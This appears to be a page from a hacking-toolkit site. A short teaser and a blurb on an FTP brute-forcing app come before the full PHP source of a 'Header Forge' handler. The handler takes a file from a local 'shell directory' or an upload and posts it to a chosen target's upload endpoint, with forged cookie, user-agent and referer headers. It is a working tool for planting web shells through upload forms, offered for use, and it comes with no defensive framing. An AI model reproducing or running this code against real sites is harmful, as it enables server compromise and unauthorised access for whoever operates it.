..we are going to create a new app for the hacksuite. We're not going to do anything fancy here, we will make a simple app to get familiar how to write compatible scripts for the..
AntiFTP uses wordlists in order to bruteforce FTP user accounts
<?php
/*
Handler for Header Forge
Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 13-04-2015
*/
set_time_limit(0);
$_MODULE_C = "thc_hf";
include_once("../../Includes/screen_header.php");
include_once($_PATHS['style_root']."/screen.php");
include_once($_PATHS['functions_root']."/scrn.php");
// options
$sOptions = "<b>logging:</b> ".($_CONTEXT['log']==true ? "on" : "off")."<br>\n";
$sOptions .= "<b>silence:</b> ".($_CONTEXT['silent']==true ? "on" : "off")."<br>\n";
$sOptions .= "<b>verbose:</b> ".($_CONTEXT['verbose']==true ? "on" : "off")."\n";
if(!function_exists("curl_file_create")){
echo $sOut;
echo"<b id=h7>You need the function curl_file_create (>=PHP 5.5)</b>";
echo $sEnd;
exit;
}
$_CONTEXT['vars'] = array();
if(isset($_POST['sPage'])){
foreach($_POST as $sKey=>$sValue){
$_CONTEXT['vars'][$sKey] = trim($sValue);
}
if(isset($_FILES['sUpload']['tmp_name'])){
// upload file from your own computer
$sData = $_FILES['sUpload']['tmp_name'];
}
else{
// use a file from the shell directory
$sData = ExploitFilter($_PATHS['shell_root']."/".$_POST['sShell'],0,1);
}
if(false==($iSizeFile = @strlen($sData))){
echo $sOut;
echo"<b id=h7>Failed to get file data or no data available</b>";
echo $sEnd;
}
else{
$rConnect = curl_init($_CONTEXT['vars']['sHost'].$_CONTEXT['vars']['sPage']);
$aPost = curl_file_create($sData,$_CONTEXT['vars']['sMedia'],$_CONTEXT['vars']['sFileName']);
$aPost = array($_CONTEXT['vars']['sVarUpload'] => $aPost);
curl_setopt($rConnect,CURLOPT_POST,1);
if(isset($_CONTEXT['vars']['sCookie']) && !empty($_CONTEXT['vars']['sCookie'])){
curl_setopt($rConnect,CURLOPT_COOKIE,$_CONTEXT['vars']['sCookie']);
}
if(isset($_CONTEXT['vars']['sAgent']) && !empty($_CONTEXT['vars']['sAgent'])){
curl_setopt($rConnect,CURLOPT_USERAGENT,$_CONTEXT['vars']['sAgent']);
}
if(isset($_CONTEXT['vars']['sReferer']) && !empty($_CONTEXT['vars']['sReferer'])){
curl_setopt($rConnect,CURLOPT_REFERER,$_CONTEXT['vars']['sReferer']);
}
if(isset($_CONTEXT['vars']['sOtherVar']) && !empty($_CONTEXT['vars']['sOtherVar'])){
$aVars = explode("&",$_CONTEXT['vars']['sOtherVar']);
for($x=0;$x<count($aVars);$x++){
$aVals = @explode("=",$aVars[$x]);
$aPost[$aVals[0]] = $aVals[1];
}
}
curl_setopt($rConnect,CURLOPT_POSTFIELDS,$aPost);
echo $sOut;
$sResult = curl_exec($rConnect);
echo $sEnd;
curl_close($rConnect);
}
}
else{
echo $sOut;
echo $sOptions;
echo $sEnd;
exit;
}
?>